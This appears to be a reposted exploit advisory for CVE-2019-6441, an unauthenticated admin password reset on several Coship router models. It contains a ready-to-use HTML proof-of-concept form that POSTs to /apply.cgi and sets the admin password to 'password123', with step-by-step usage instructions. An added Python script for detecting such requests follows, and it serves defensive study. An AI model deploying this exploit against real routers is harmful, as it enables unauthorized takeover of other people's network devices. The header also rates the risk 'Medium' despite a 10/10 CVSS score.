Coship Wireless Router Unauthenticated Admin Password Reset

2019.01.17
Credit: Adithyan AK
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-255


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!--
# Exploit Title: Coship Wireless Router - Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441

# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on "Submit request"
# Password of the admin will now be changed as "password123"

# PoC :
-->

<html>
  <!-- Change the X.X.X.X with the router's IP address -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://X.X.X.X/apply.cgi" method="POST">
      <input type="hidden" name="page" value="regx/management/accounts.asp" />
      <input type="hidden" name="http_username" value="admin" />
      <input type="hidden" name="http_passwd" value="password123" />
      <input type="hidden" name="usr_confirm_password" value="password123" />
      <input type="hidden" name="action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
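
A detection check for the request this PoC sends, added here as an example and not part of the original advisory: it parses captured HTTP requests and flags an account-password POST to `/apply.cgi` that carries no credential header. The function names, the sample requests and the assumption that an authenticated admin request would carry an `Authorization` or `Cookie` header are not from the advisory.

```python
from urllib.parse import parse_qs

# Path and form fields taken from the PoC on this page.
TARGET_PATH = "/apply.cgi"
ACCOUNTS_PAGE = "regx/management/accounts.asp"
# Assumption: an authenticated admin request carries one of these headers.
AUTH_HEADERS = ("authorization", "cookie")


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, form)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return method, target.split("?", 1)[0], headers, form


def is_unauth_password_reset(raw):
    """True for an account-password POST that carries no credential header."""
    method, path, headers, form = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return False
    if form.get("page") != ACCOUNTS_PAGE or "http_passwd" not in form:
        return False
    return not any(h in headers for h in AUTH_HEADERS)


# Constructed sample traffic (192.0.2.1 is a documentation address).
BODY = ("page=regx%2Fmanagement%2Faccounts.asp&http_username=admin"
        "&http_passwd=EXAMPLE&usr_confirm_password=EXAMPLE&action=Submit")
BASE = ["POST /apply.cgi HTTP/1.1", "Host: 192.0.2.1",
        "Content-Type: application/x-www-form-urlencoded"]
SAMPLES = {
    "no-credentials": "\r\n".join(BASE) + "\r\n\r\n" + BODY,
    "with-credentials": "\r\n".join(
        BASE + ["Authorization: Basic YWRtaW46ZXhhbXBsZQ=="]) + "\r\n\r\n" + BODY,
    "unrelated": "GET / HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, "->", "ALERT" if is_unauth_password_reset(raw) else "ok")
```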



Copyright 2019, cxsecurity.com

 
